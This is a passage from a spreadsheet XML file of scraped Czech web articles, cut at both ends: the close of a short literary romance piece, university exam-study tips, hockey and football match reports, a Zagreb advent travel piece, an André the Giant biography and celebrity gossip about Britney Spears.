si ruku nadvakrát zlomil. Ne že by to nebyl ochoten podstoupit, ale Klára byla naštěstí zkušená, otočila se k němu zády a najednou bylo všechno snadné a … jen si přál mít větší ruce, tiše naříkal blahem, a když už prozkoumal poslední tajné zákoutí a v očích mu začaly praskat vlásečnice, Klára se otočila, s virtuozitou houslového mistra mu v řádu milisekund nasadila ochranu a on se pak už jen bezvládně řítil do děsivě nádherné propasti, o jejíž dno se společně s výkřikem roztříštili. Bohužel Klára v Janovi nenašla žádný vytoužený přístav, i když o to dost stála. Časem udělali ještě pár pokusů, ale překážek bylo příliš mnoho a hory, jak známo, přenáší jenom láska, což tenhle případ nebyl. Už se nesetkali a on se později s jinými dívkami dostal celkem také dost daleko, někdy až k delikátní šperkařské práci, kdy se přes vzácné kovy propracoval až k drahokamům, ale dál nic. David znovu dolil šampus a zvedl číši. „Děkuji ti za nevšední kulturní zážitek, a pokud jde o tvůj nechtěný celibát, nemusíš, milý kamaráde, ničeho litovat. Vlastně o nic nepřicházíš, protože, a tohle si zapamatuj, jen s milovanou láskou je to o nebi.“ Na chvíli zavládlo nábožné ticho. „Víš, Honzo, každá žena má moc učinit muže šťastným a dát mu klid, ale upřímně, která to udělá. Chlap je jako řeka. Pokud se žene korytem, je z ní užitek, když ale narazí na odpor, vystoupí z břehů a pustoší sebe i všechny blízké. Těmi břehy je ženská náruč. Podle mě tohle ženy přestávají chápat nebo to prostě už takhle nechtějí. Věčné jsou na nebi hvězdy blikající život však trvá jen záblesk té padající Z mojí knihy JEN ZÁBLESK, janpodesva.weebly.com Autor: Jan Podešva Autor person Jan Podešva</t>
  </si>
  <si>
    <t>20241201_209_3475640437_a863a496e7a3f7cbc41e.html</t>
  </si>
  <si>
    <t>a863a496e7a3f7cbc41e</t>
  </si>
  <si>
    <t>OUčení na zkouškové: Zásobárna těch nejlepších tipů!</t>
  </si>
  <si>
    <t>OUčení na zkouškové: Zásobárna těch nejlepších tipů! Přehled těch nejlepších tipů nejen pro nadcházející zkouškové sepsala studentka Karolína Horklová. Přečti si zásobu tipů třeba o efektivním učení, psaní poznámek, zvládání času nebo o péči o psychickou pohodu. Zajímá tě téma více? Stav se na seminář Jak přežít první zkouškové 5. prosince do S-zóny. Karolína Horklová 1. prosince 2024 Student, Poradenské centrum a Centrum Pyramida 7 min. Blíží se zkouškové období a s ním i potřeba efektivního plánování, soustředění a zvládání stresu. V takových chvílích mohou rozhodovat nejen znalosti, ale také dobré strategie, jak si s učením poradit. Dnešní článek ti nabídne praktické tipy na efektivní učení, psaní poznámek, zvládání času a péči o psychickou pohodu – protože správný přístup ke studiu může být klíčem k úspěchu i ke klidnějšímu zkouškovému období. Autorkou textu je Karolína Horklová, studentka navazujícího magisterského programu Speciální pedagogika na OU. Působí jako ambasadorka Centra Pyramida, kde se aktivně věnuje osvětovým a podpůrným aktivitám zaměřeným na studenty se specifickými potřebami. Začneme s organizací poznámek: Ručně i na počítači: Kombinuj psaní rukou s digitálním přepisem pro lepší zapamatování. Uspořádání poznámek: Použij složky a organizéry pro přehlednost. Zkratky: Piš zkráceně pro rychlost (například „psy“ místo psychologie). Zvýraznění a symboly: Barevně označ důležité pojmy a použij symboly. Vlastními slovy: Piš tak, aby byly poznámky srozumitelné. Minimální rozptýlení: Soustřeď se na výklad, ne na okolí. Přepis: Po hodině si přepiš poznámky do počítače. Barevné kódování: V digitálních poznámkách rozliš důležitost barvami. A jak na učení? Najdi svůj styl: Uč se způsobem, který ti vyhovuje (čtení, poslech, vizuální metody). Klidné prostředí: Vyber si místo bez rušivých vlivů. Strategie opakování: Opakuj si důležité informace pro jejich přesun do dlouhodobé paměti. Zkoušení bez pomůcek: Zkus si látku vybavit zpaměti, například vyprávěním. Střídání metod: Čti a opakuj nahlas. Alternativní zdroje: Vyhledej filmy nebo obrázky pro lepší pochopení. Blokové učení: Uč se v krátkých blocích s přestávkami. Opakování před spaním: Spánek zlepšuje zapamatování. Zpříjemni si učení: Hudba, pohyb a zdravé občerstvení podporují soustředění. Můžeš zkusit některé techniky učení, ale je jich hodně, tak hledej, zkoušej a vybírej: SQ3R ve zkratce: (Survey – Prohlédni): Rychle si projdi text – nadpisy, podnadpisy, úvod a závěr. Získej základní představu o obsahu. Q (Question – Otázky): Polož si otázky k tématu, které může text zodpovědět. Například „Co je hlavním bodem?“ nebo „Jaké jsou klíčové pojmy?“ R (Read – Čti): Přečti si text pozorně a hledej odpovědi na položené otázky. R (Recite – Vyslov): Po každé části si nahlas shrň hlavní myšlenky vlastními slovy. Pomůže ti to lépe si obsah zapamatovat. R ( Review – Opakuj): Na závěr si projdi svoje poznámky a zopakuj si nejdůležitější informace. Tím upevníš látku v paměti. POMODORO: Tato technika staví na zjištění, že podle výzkumu jsme schopni udržet pozornost po dobu 20–25 minut. Jestliže potřebuješ pracovat po delší dobu, rozděl si úkol na dílčí části. Pro každou dílčí část si vyčleň 25 minut. A následně si udělej 5 minut pauzu. Během jednoho pracovního úseku se soustřeď pouze na jeden úkol. FLASHCARDS: Tvoř si kartičky – při vlastní tvorbě si učivo lépe projdeš a zapamatuješ. Zvýrazňuj zásadní pojmy, aby byly kartičky zajímavé a přehledné. Shrň informace stručně – na každou kartičku dej jen jednu informaci. Jasně rozděl jednotlivé pojmy nebo fakta – pokud se učíš například latinské pojmy, napiš každý pojem na samostatnou kartičku. Chceš podpořit svůj mozek? Tak si přečti, co na něj má dobrý vliv: Jídlo: Ořechy, ovoce, bylinné čaje, voda, avokádo, losos, borůvky. Prostředí: Čisté ovzduší a příroda, dobré vztahy s rodinou a blízkými, kreativní kolektiv. Emoce: Radost, spokojenost, štěstí, láska. Činnosti: Poslouchání hudby, procházky, vzdělávání, meditace, spánek, sex, masturbace; kritické přemýšlení, sudoku, cvičení paměti, křížovky, rozšiřování slovní zásoby, logické hádanky, šachy; zkoušení něčeho, co mi nejde. A jak to všechno zvládnout? Na to existuje kouzelné slovo – PSYCHOHYGIENA – zkus naše tipy: Praktikuj relaxační techniky, jako je hluboké dýchání a pohyb. Dbej na kvalitní stravu, pravidelný pohyb a dostatek spánku. Jóga, meditace a masáže pomáhají uvolnit napětí. Věnuj se koníčkům a zapisuj si pozitivní myšlenky. Sdílej své starosti s blízkými, pomáhá to snižovat stres. Smích a pomoc druhým dodávají smysl a uvolnění. Zaměř se na důležité úkoly a eliminuj ty nepotřebné. Konzultace s odborníkem ti může pomoci zvládat stres efektivněji. Vyhýbej se alkoholu a nezdravému jídlu jako reakci na stres. A co dělat, když už je toho na tebe opravdu hodně? Dýchej: Zklidni se hlubokým, pomalým dechem. Polož ruku na břicho a vnímej pohyb dechu. Metoda 5-4-3-2-1: Zkus techniku uzemnění – popiš si v mysli 5 věcí, které vidíš, 4 věci, které cítíš, 3 zvuky, 2 vůně nebo chutě, a nakonec si řekni něco povzbudivého. Hledej pomoc: Vyhledej podporu u Poradenského a kariérního centra nebo přes aplikace jako Nepanikař a Opatruj.se. A teď trochu Time managmentu: Ten se hodí vždy a všude, nejen před zkouškami. Efektivní učení jde totiž ruku v ruce s dobrým time managementem. Když si správně naplánuješ čas, dokážeš se učit efektivněji a s menším stresem. Plánuj dopředu: Zapisuj si úkoly a termíny do diáře nebo aplikace. Přidej opakující se povinnosti na konkrétní dny (například cvičení, práce na projektu). Rozvrhni náročné úkoly na začátek dne, kdy máš více energie. Pracuj efektivně: Rozděl si práci na menší úseky. Seskupuj podobné úkoly (například psaní e-mailů, čtení). Buď flexibilní: Vždy nech prostor pro nečekané situace. Neplánuj den „k prasknutí“. Odpočívej: Vyvážený režim mezi učením a relaxací zlepší produktivitu. Zařaď krátké přestávky, procházky nebo meditaci. Odpočívej i večer, ať můžeš zítra pokračovat s novou energií. Urči si realistické časové hranice ke každému úkolu, ať se můžeš držet plánu. Tak už víš, jak na to? S těmito tipy a technikami máš všechny nástroje pro zvládnutí nejen zkoušky, ale i studia s přehledem a klidem. Organizace, správné strategie učení a péče o psychickou pohodu ti pomohou dosáhnout úspěchu, aniž bys zapomněl na sebe. Věříme, že to s námi zvládneš – teď už je to jen na tobě! Pokud chceš mít jistotu, že nic nepodceníš, zveme tě na náš seminář Jak přežít první zkouškové, který je součástí našich studijních čtvrtků s názvem 10krát OUčení. Koná se 5. prosince v S-zóně Univerzitní knihovny – místo si rezervuj tady. A když už se blíží ty Vánoce, posíláme ti i pár tipů na chytrou literaturu, kterou si můžeš zakoupit u nás na Mlýnské v OUshopu: Jak si dělat chytré poznámky? Mít vše hotovo v praxi: Cvičebnice produktivity bez stresu. Nauč se to! Jak se pomocí vědy efektivněji učit a více si pamatovat. Technika Pomodoro: Legendární systém pro plánování času a dokonalou koncentraci během hluboké práce. Mindfulness pro začátečníky. Za tým Poradenského a kariérního centra OU Karolína Horklová. Student | Věda, společnost a umění 12. května 2023 2 min. Věda, společnost a umění 17. května 2023 Autor: Karolína Horklová Autor person Karolína Horklová</t>
  </si>
  <si>
    <t>688</t>
  </si>
  <si>
    <t>462</t>
  </si>
  <si>
    <t>20241201_21_3479029816_14d8353bad47260ae7f8.html</t>
  </si>
  <si>
    <t>14d8353bad47260ae7f8</t>
  </si>
  <si>
    <t>Na jihu si skalpu Mountfieldu obzvlášť váží. Neměli jsme ani metr ledu, lituje hradecký trenér</t>
  </si>
  <si>
    <t>Shrnutí Na jihu si skalpu Mountfieldu obzvlášť váží. Neměli jsme ani metr ledu, lituje hradecký trenér Martin Kézr 1. 12. 2024, 21:06 Hokejisté Motoru přidali čtvrtý korálek na šňůru extraligových vítězství, když zdolali 4:2 Hradec Králové . Radost z toho měli velikou, skalp Mountfieldu si v Českých Budějovicích obzvlášť cení s ohledem na rivalitu vzniklou odchodem klíčového sponzora z města před jedenácti lety. Přihlaste se a sledujte exkluzivní videa z Tipsport extraligy Přihlásit se České Budějovice - Hradec Králové 4:2 (43. Valský) Video: Tipsport Extraliga / BPA Článek „Šli jsme na led s maximálním úsilím, že právě s Hradcem urveme tři body. Vážíme si jich a ocenil bych především obětavost a vůbec týmový projev. Hodně jsme si pomohli i dvěma bleskově využitými přesilovkami,“ říkal útočník Jan Ordoš , jenž se po dlouhém zranění vrátil do sestavy teprve před dvěma týdny a z nedělního utkání měl bilanci 1+1. Hosté dvakrát vyrovnali, a když o druhé pauze v kabině spřádali plán, jak se o to pokusí i potřetí, zhatila jim všechno gólová akce Jakuba Valského po 149 vteřinách třetí části. „Skvěle zvládnuté přečíslení po zisku puku ve středním pásmu, vzali jsme tím Hradci naději,“ líčil autor čtvrté budějovické trefy. Spokojenost byla i na střídačce Motoru, jenž má přitom na marodce Pecha, Štencla i Nováka. „Naladění i sebedůvěra hráčů od reprezentační pauzy rostou, hlavně se lepší jejich zacházení s pukem. Nejen v přesilovkách dokážeme rychle kombinovat a vzít brankářům soupeře oči,“ těšilo trenéra Ladislava Čiháka. „Vyrovnali jsme se silnému soupeři ve vitalitě a měl navrch v houževnatosti. Tentokrát jsme se vyvarovali slabších pasáží, které v utkání míváme,“ doplnil asistent kouče Jiří Hanzlík. „Nebyli jsme dost disciplinovaní a nechávali se nachytat, když domácí rychle otáčeli hru. Neměli jsme ani metr ledu, abychom se dostali k naší rychlé, bruslivé hře,“ připustil asistent trenéra hostů Peter Frühauf . Pro Hradec , který zahájil sérii čtyř vystoupení na cizích kluzištích, je nedělní nezdar teprve třetím z poslední čtrnácti zápasů v této sezoně. „Ublížilo nám, že jsme neustále jen dotahovali. Potřebovali bychom mít víc dorážek i předvádět jednodušší hru s přímým tlakem do brány. Musíme ale umět ocenit i styl hry Motoru, který hodně našich střel zblokoval,“ říkal obránce Graeme McCormack. Diskuze Sdílejte článek Související témata: Hokej Tipsport Extraliga HC Motor České Budějovice Mountfield HK Autor: Martin Kézr Autor Martin Kézr</t>
  </si>
  <si>
    <t>776040</t>
  </si>
  <si>
    <t>808190</t>
  </si>
  <si>
    <t>20241201_210_3475553649_71370d54d5cd34eedaa2.html</t>
  </si>
  <si>
    <t>71370d54d5cd34eedaa2</t>
  </si>
  <si>
    <t>Záhřeb v adventním hávu. Chorvatsko zve před Vánocemi i k moři</t>
  </si>
  <si>
    <t>Záhřeb v adventním hávu. Chorvatsko zve před Vánocemi i k moři Koledy, svařené víno , zářící svíčky a ozdoby či Santa Claus v Chorvatsku ? Pro turisty vyhlížející advent v zahraničí může být takový Záhřeb zpestření výběru mimo obligátní města jako Drážďany , Salcburk , Vídeň , Krakov či Budapešť . „Zájem o kratší adventní výlety je také o Chorvatsko ,“ uvedla ředitelka cestovní kanceláře Travel Family Martina Blahová . Země na Jadranu už nechce být pouze doménou letních dovolených. Stále více návštěvníků, stejně jako místních hoteliérů, zaměřuje svou pozornost mimo hlavní sezonu. „V Chorvatsku je aktuálně trend, že i v listopadu či prosinci, stejně jako v jarních měsících, zůstávají v plném provozu hotelové kapacity v hlavních přímořských letoviscích. Otevřeny jsou i restaurace a další zařízení,“ doplnila za cestovku manažerka pro Chorvatsko Lenka Laus. Záhřeb : hned 18 míst pro adventní slavnosti Adventní trhy v Záhřebu získaly v minulosti titul Nejlepší evropský vánoční trh. Letos začínají 30. listopadu a končí 7. ledna. „Slavnosti hostí celkem osmnáct míst,“ informovala záhřebská turistická centrála. Hlavní události se konají na Náměstí bána Jelačiće , kde návštěvníci najdou bohatou vánoční výzdobu a řemeslné stánky. Pod vánočním stromem to provoní tradiční perníčky a svařené víno . Státy EU Mezi oblíbená místa patří i park Zrinjevac s osvětlenou alejí a tradiční hudbou nebo Měsíční zahrada v parku Ribnjak. Ikonické a jedno z největších kluzišť v regionu na náměstí krále Tomislava slaví desáté výročí. Láká aktivnější návštěvníky na jedinečný zážitek bruslení pod širým nebem. A to denně až do jedenácti v noci. | Video: Youtube Kulturní program se tento rok rozšíří o Kvaternikovo náměstí a jednou z perel bude sledování vysílání baletní show Louskáček na ledě. Tunel Grič je unikátní místo spojující historii a moderní umění. Každý rok se promění do tematické vánoční instalace s interaktivními světelnými efekty a dekoracemi, což vytváří magickou atmosféru. To záhřebský trh Dolac Market se o adventu stává gastronomickým rájem. Benátský karneval po Chorvatsku Jednou z nejoblíbenějších částí slavností je jakýsi gastronomický festival Fooling Around od Fuliranje na terase hotelu Esplanade, tentokrát tematicky v duchu Benátského karnevalu. Letos se na trzích v hlavním městě objeví nové kombinace chutí, například fúze tradičních štruklí s moderními přísadami, jako jsou lanýže nebo exotické koření. Štrukle v adventní verzi tradičního pokrmu obvykle obsahují sladké nebo slané náplně (například s tvarohem, dýní nebo sýrem) a jsou zapečené do křupava. Státy EU Z masových specialit Chorvati s oblibou připravují „kobasice“ s kysaným zelím nebo ve stylu „čevapi“ podávané v housce s pikantními omáčkami. Tradiční pokrm sarmice se skládá z mletého masa, rýže a koření zabalených v zelných listech, podávaných s rajčatovou omáčkou. Sladkou chutí oplývají fritule - chorvatská obdoba malých koblih, často s náplní z rozinek, skořice nebo citronové kůry. Jsou přelité čokoládou, karamelem nebo posypané cukrem. Nechybí adventní klasika horká čokoláda a kaštany, ale i klasický fast food. Loni podle zjištění Deníku stál hot dog 3,50 eura, klobáska 4,50, pizza 8 až 10 eur. Magická pohádka na pobřeží Koho však láká i v zimě více chorvatské pobřeží, nemusí zoufat. Na vánoční trhy u moře zve řada destinací. Město Opatija na Istrii zve na zimní pohádku. Už loni vzbudila zájem virtuální procházka a lázeňské město se vždy pyšní luxusně vyzdobenými ulicemi i různými hudebními a divadelními představeními. Uchvátí procházka po proslulé přímořské promenádě Lungomare s bohatě vyzdobenými historickými parky. Odpočinek lidé najdou v malebném Volosku. Zájemci si v Opatiji vyzkouší dirigování sboru vánočních skřítků, setkají se s obřími vojenskými louskáčky a jejich jedinečnými opatijskými variantami s ocasy mořských panen. Obdiv vzbuzuje stoletý buk ozdobený tisíci světel. Centrem adventních akcí je prostor před Pavilonem umění Juraje Šporera. Česko a EU Na nejmagičtější advent v regionu Kvarner lákají představitelé Rijeky . Brzy se tam první bruslaři rozjedou na kluzišti s jedinečnou polohou u moře. Na předvánoční romantický čas s kouzelnými světly je v dalmatském Splitu připravená slavná promenáda Riva , na koncerty Pjaca - Náměstí národa. Na jihu se perla Jadranu Dubrovník díky zimnímu festivalu promění v podmanivou vánoční říši divů, na čele s historickou ulicí Stradun. Autor: Přemysl Spěvák Autor Přemysl Spěvák Rubrika transition_slide Zprávy</t>
  </si>
  <si>
    <t>705220</t>
  </si>
  <si>
    <t>20241201_211_3475479222_2363f9689d07a6f2778c.html</t>
  </si>
  <si>
    <t>2363f9689d07a6f2778c</t>
  </si>
  <si>
    <t>Pozoruhodný život monstra. André the Giant se nejen díky svému vzezření stal legendou</t>
  </si>
  <si>
    <t>Pozoruhodný život monstra. André the Giant se nejen díky svému vzezření stal legendou Skolil i Hulka Hogana. Obr André se stal nezapomenutelnou legendou Wrestler, herec, který neměl konkurenta nejen ve své bojové kariéře, ale také v pití alkoholu . Mnohými obdivovaný 224 centimetrů měřící a cca 240 kilogramů vážící gigant ale zemřel příliš brzy. Narodil se v městečku Coulommiers , rok po konci druhé světové války, jako André René Roussimoff v roce 1946. Právem považován za osmý div světa, znám také pod přezdívkou - Největší opilec na světě . Po narození vážil neuvěřitelných 6 kilogramů a už v raném dětství se u něj projevovaly znaky gigantismu. Už ve školce byl o hlavu vyšší než ostatní děti a měl abnormálně dlouhé ruce. Ve dvanácti letech měřil již 190 cm a vážil 110 kg, v sedmnácti letech se začal připravovat na dráhu profesionálního wrestlera. „Trpěl“ gigantismem způsobeným přebytkem růstového hormonu, který později vyústil v akromegalii. Ta byla způsobena mutací v genu pro růstový hormon. Tato mutace způsobila, že Andrého tělo produkovalo nadměrné množství růstového hormonu, což vedlo k jeho obrovské velikosti. V osmnácti se přestěhoval do Paříže , kde hledal lepší život. Tam si ho okamžitě všiml organizátor profesionálního zápasení Robert Legeat, který v Roussimoffovi viděl obrovský talent. Zařídil mu proto večerní tréninky v zápasení, přes den pracoval jako stěhovák, aby měl na živobytí. V roce 1966 se dostal do hledáčku kanadského promotéra Franka Valoise, který mu začal dělat manažera, což mu změnilo život. Vzdal se práce a začal se živit jako zápasník. Od roku 1963 zářil v ringu, kde jako wrestler dosáhl ohromného úspěchu a obliby u fanoušků. Byl také blízkým přítelem nejznámějšího zápasníka všech dob, Hulka Hogana, s nímž se střetl během Wrestlemanie III, a kterého dokázal porazit. Dostal se dokonce do Guinnesovy knihy rekordů. Stalo se tak v roce 1974, když do ní byl zapsán jako nejlépe placený zápasník v historii. V té době vydělával ročně zhruba 400 tisíc dolarů, což je ekvivalent k současným zhruba 2 a půl milionu. André měl až nadlidskou sílu. Byl například schopen jako nic zvednout hned dva wrestlery, každého minimálně se 120 kg na každé ruce. Dnešní odborníci se shodují, že není jasné, jak silný opravdu byl a jaká byla jeho hranice. Nikdy totiž nechodil do posilovny a cvičil jedině v rámci rehabilitace po operaci zad. André Roussimoff byl známý také svou velkorysou povahou. Často se zastavoval, aby se pozdravil s fanoušky a podepsal jim autogramy. Především díky svému gigantickému vzhledu se dostal do povědomí také filmařům. Poprvé ho obsadili do role Bigfoota (obdoba yettiho) v seriál The six million dollar man. Dále se objevil jako obr v několika malých rolích v jiných seriálech, za zmínku stojí například The Greatest American Hero . V roce 1984 si poprvé zahrál v celovečerním filmu, a to v Ničiteli Conanovi kde vystoupil coby Dagoth . V roce 1987 přišla jeho největší filmová role, kdy hrál Fezzika ve filmu The Princess bride. Během natáčení tohoto filmu brával prý večer herecké kolegy na „skleničku“. Přátelské posezení se vždy zvrtlo v brutální kocoviny všech zúčastněných.Kromě toho se objevil v jedné epizodě seriálu Zorro a naposledy hrál ve filmu Trading Mom. Kromě úctyhodné síly se vyznačoval i neobyčejným apetitem v konzumaci alkoholu . Běžně vypil celou bednu vína za jedno sezení (6 × 4 láhve). Zápasník Ric Flair potvrdil, že na posezení vypil 106 piv ! Jindy spořádal 108 dvanácti uncových (350 ml) kousků, a to během pouhých 45 minut. André měl rád také koktejly. Mezi jeho nejoblíbenější patřil The American , což byl více než litrový nápoj skládající se z různých likérů. Podáván byl ve velkých džbánech, kterých si André dopřával hned několik za sebou. Jeho herecký kolega Cary Elwes to okomentoval slovy, že když koktejl zkusil, připadalo mu, že pije palivo do letadla. Právě přehnané pití se patrně podepsalo na jeho vážných problémech, a to nejen zdravotních, ale i psychických. Sám sebe vnímal spíše jako cirkusovou atrakci. Ročně zápasil zhruba 300 dní v rámci show, což se rovněž silně podepsalo na jeho zdravotním a duševním stavu. Ve třiceti letech začal trpět těžkou bolestí zad a kolen, která byla způsobena nedostatečným prokrvením životně důležitých orgánů těla a svalů. Kariéru ukončil roku 1992, rok před smrtí. Legendární wrestler nakonec zemřel ve věku 46 let ve čtvrtek 28. ledna 1993 v Paříži . Příčinou smrti byl infarkt. Den předtím se zúčastnil pohřbu svého otce, což jeho srdce pravděpodobně nezvládlo. Filmové ocenění jeho osoby představuje dokumentární film André the Giant , který vznikl ve spolupráci s HBO. Zdroje: https://www.kabinetkuriozit.eu/andre-the-giant/ https://fungate.cz/andre-the-giant/amp/ https://www.csfd.cz/tvurce/34742-andre-the-giant/biografie/ https://g.cz/andre-the-giant-wrestlingova-legenda-ktera-dokazala-vypit-sud- piva / https://zivotopis.osobnosti.cz/andre-the-giant.php https://www.lifee.cz/historie-a-tajemno/obr-andre-v-baru-pry-dokazal-utratit-za-jednu-noc-az-40-000-dolaru-a-vypit-156- piv _467637.html https://en.m.wikipedia.org/wiki/Andr%C3%A9_the_Giant</t>
  </si>
  <si>
    <t>20241201_212_3475479316_ed107b0090acd54da1fe.html</t>
  </si>
  <si>
    <t>ed107b0090acd54da1fe</t>
  </si>
  <si>
    <t>Dramatické hornické derby: Karviná vedla, ale Baník zaslouženě vítězí</t>
  </si>
  <si>
    <t>Dramatické hornické derby: Karviná vedla, ale Baník zaslouženě vítězí Souboj slezských rivalů přinesl atraktivní fotbalovou podívanou, která měla náboj až do samého konce. Karviná se sice nejprve ujala vedení, ale Baníku se ve druhém poločase podařilo zaslouženě skóre otočit. Rozhodující branku zaznamenal v 89. minutě domácí kapitán Ewerton. Slušně zaplněné hlediště Městského stadionu v Ostravě - Vítkovicích očekávalo v sobotu odpoledne atraktivní souboj mužstev, kterým se v posledních týdnech daří. Baník vstupoval do zápasu i přes porážku v minulém kole v Jablonci jako třetí tým Chance Ligy, hostům z Karviné patřila po posledním domácím vítězství s Pardubicemi sedmá příčka ligové tabulky. Jednou z mnoha zajímavostí zápasu byla skutečnost, že byla poprvé v historii české nejvyšší soutěže pro rozhodování zápasu nominována dvojčata. Hlavnímu Janu Benešovi na čáře asistoval jeho bratr Adam. Baníkovci nastoupili do zápasu bez nigerijského beka Emannuela Uchenny pykajícího za 4 žluté karty, díky čemuž se do základní sestavy po několika týdnech dostal Matěj Chaluš . Na druhé straně se představil na kraji karvinské obrany čtyřicetiletý matador Jiří Fleišman , jenž zaznamenal v dresu svého dnešního soupeře přes 150 ligových startů. Pouze na lavičce Karvinských zahájil utkání jejich dosavadní nejlepší střelec Filip Vecheta. Ostravský klub vyhlásil na tento zápas marketingovou akci snižující s každým gólem Baníku cenu piva o 3 koruny. Nejen proto domácí příznivci doufali v co nejvíce vstřelených gólů do hostující sítě. Úvodní tlak Baníku , skórovala ale Karviná První pohlednou akcí se hned ve druhé minutě zápasu prezentoval Baník , ale finální přihrávku Buchty na Ewertona si pohlídal gólman Lapeš, který o pár chvil později bez problémů zneškodnil první střelu mezi tyče z kopačky Šína. Baník poté na dobrých pět minut zavřel hosty v jejich vápně, ale z úvodního tlaku vytěžil pouze tři rohové kopy. Na druhé straně se ale osmělila také Karviná , když ve 14. minutě přihrával na velké vápno Ezeh zcela osamocenému Fleišmanovi , který v nadějné pozici minul branku Markoviče. O pár chvil později ale přišel pro domácí šok. Memič našel pasem na pravé straně Valla, který se prosadil přes tři obránce Baníku a ranou z penaltového puntíku nekompromisně skóroval. Baník se pokusil ihned gólově odpovědět, ale závar před Lapešem po střele Ewertona odvrátila karvinská obrana na roh. V následující pasáži hry se už hostům podařilo tlak Baníku eliminovat a obraz hry vyrovnat. Domácí svými pokusy sice několikrát ohrozili Lapešovu branku, ale o vyložené příležitosti se nejednalo. Až ve 40. minutě se opět zablýsklo před hostujícím gólmanem. Ewerton utekl karvinským obráncům, dostal se zleva před Lapeše a zvolil přihrávku na střed Šínovi, který na míč nedosáhl. Přihrávka ale prošla až k na zadní tyč nabíhajícímu Buchtovi, jehož střelu vykopl na brankové čáře hostující kapitán Fleišman a zachránil tak Karvinou od obdržené branky. V posledních vteřinách prvního dějství se ještě k hlavičce z nebezpečné pozice dostal osamocený Pojezný, který ovšem svým pokusem netrefil Lapešovu svatyni. Zahozená penalta Ewertona a vyrovnání Úvod druhého poločasu začal očekávanou snahou domácích o vyrovnání. Nejprve zkoušel pozornost Lapeše střelou z pravé strany Frydrych, hostující gólman však bez problémů zasáhl. Hned nato se ale po individuální akci Ewertona dostal míč do obrovské šance k Šínovi, toho dle rozhodčího nedovoleně zastavil Krčík a byl z toho pokutový kop. K tomu se postavil ostravský tahoun Ewerton, ale skvěle chytající karvinský brankář jeho střelu famózně zneškodnil a skóre se tak neměnilo. Hra i nadále pokračovala obrovským tlakem Baníkovců a také jejich narůstající nervozitou, jež vyústila v 57. minutě ve strkanici hráčů obou týmů v pokutovém území hostů. V 64. minutě se Chachaři v ochozech konečně dočkali. Míč se po dalším závaru v pokutovém území Karviné dostal k volnému Prekopovi, který z postavení na ofsajdové hraně skóroval. Původně signalizovaný ofsajd ostravského útočníka videorozhodčí opravil a domácí se tak mohli radovat z vyrovnání. Závěrečný tlak Baníku přinesl rozhodující branku Do konce zápasu zbývalo ještě mnoho času a Karvinští věděli, že je ještě bude čekat pořádná šichta. A když jejich kapitán Fleišman obdržel v 71. minutě druhou žlutou kartu a musel se odebrat do šaten, začalo pro Karvinou perných posledních 20 minut zápasu. Hned za pár minut mohl být obrat dokonán, když Šín uvolnil průnikovou přihrávkou za obránce spoluhráče Prekopa, který ale svoji tutovku zahodil a poslal míč vedle Lapešovy brány. Na začátku poslední desetiminutovky se zrodily další příležitosti domácích, ale neujala se ani střela Ewertona ani nabídka Frydrycha, na kterou na malém vápně nedosáhl Holzer. A co se nepovedlo Baníku , mohlo se na druhé straně podařit Karvinským, kteří se i v deseti sympaticky vydávali ohrožovat Markovičovu branku. V 84. minutě musel velmi důležitý zákrok předvést právě domácí brankář, když protiútok hostů po ose Ezeh-Planka-Ayaosi zakončoval poslední jmenovaný pouze do ostravského gólmana. Vysvobození pro Baníkovce přišlo v 89. minutě. Přihrávka Fomby z levé strany pokutového území doputovala k Ewertonovi, který z deseti metrů prostřelil vše, co mu stálo v cestě a zajistil tak domácím vítězství. Domácí tedy nakonec tento velmi těžký zápas zvládli. Sympaticky hrající a bojující hosté se sice dostali do vedení, ale nedokázali odolat obrovskému tlaku Baníkovců, kteří nakonec těsně před koncem zápasu zaslouženě překlopili skóre zápasu na svoji stranu. Muž zápasu podle 90 minut: Erik Prekop ( Ostrava ) FC Baník Ostrava – MFK Karviná 2:1 (0:1) Branky: 66. Prekop (Holzer), 89. Ewerton (Fomba) – 15. Vallo (Memić) Žluté karty: 29. Boula, 58. Rigo – 45+1. Fleišman , 58. Boháč, 71. Fleišman , Červená karta : 71. Fleišman ( Karviná ) FC Baník Ostrava : Markovič – Frydrych, Chaluš , Pojezný – Buchta (90+3. Rusnák), Boula, Rigo (78. Kubala), Holzer – Šín (87. Fomba), Ewerton (C) (90+3. Grygar), Prekop. Náhradníci: Holec – Fukala, Kpozo, Tanko, J. Juroška, Munksgaard, Měkota. Trenér: Pavel Hapal MFK Karviná : Lapeš – Vallo, Endl, Krčík, Fleišman (C) – Boháč (67. Čavoš), Planka – Samko (90. Vecheta), Botos (73. Ayaosi), Memić (73. Ražnatović) – Ezeh. Náhradníci: Knobloch – Moses, Regáli, Vinicius, Svozil, Singhateh, Mikuš. Trenér: Martin Hyský Diváci: 9 014 Rozhodčí: J. Beneš – Paták, A. Beneš Autor článku: Marek Hajžman Autor: Autor článku:</t>
  </si>
  <si>
    <t>20241201_213_3475478498_41e9db1c8753136a593a.html</t>
  </si>
  <si>
    <t>41e9db1c8753136a593a</t>
  </si>
  <si>
    <t>Britney Spears: „Skončila jsem s muži“</t>
  </si>
  <si>
    <t>Britney Spears : „Skončila jsem s muži“ Britney Spears Britney Spears , známá popová ikona, se po turbulentních událostech ve svém osobním životě rozhodla udělat zásadní změny. Prohlásila, že ukončila vztahy s toxickými muži a hodlá se soustředit na svou vlastní pohodu, střízlivost a finanční nezávislost. Podle informací zveřejněných deníkem Daily Mail je Britney připravena věnovat se sama sobě a své budoucnosti. Konec s bývalými partnery a nový směr Britney údajně ukončila kontakt se svým bývalým komorníkem Paulem Solizem, se kterým byla spojována po rozvodu se Samem Asgharim. Rozhodla se zůstat svobodná a věnovat čas uzdravení a osobnímu růstu. „Bude trvat dlouho, než se plně vzpamatuje, ale zatím s muži skončila,“ sdělil zasvěcený zdroj. Britney je také odhodlána zůstat střízlivá. Přestože si občas dá sklenku vína , zdroje tvrdí, že nemá problémy s alkoholem nebo drogami, jak se mnozí fanoušci domnívají. Usmíření se syny jako klíčový moment článek pokračuje na další stránce.. Autor: - || jdavid || | || | | jdavid | -</t>
  </si>
  <si>
    <t>20241201_214_3475516079_6edba0246367c6fa5d3c.html</t>
  </si>
  <si>
    <t>6edba0246367c6fa5d3c</t>
  </si>
  <si>
    <t>Vánoční polévky z různých koutů světa: Na sváteční stůl patří lokální ingredience</t>
  </si>
  <si>
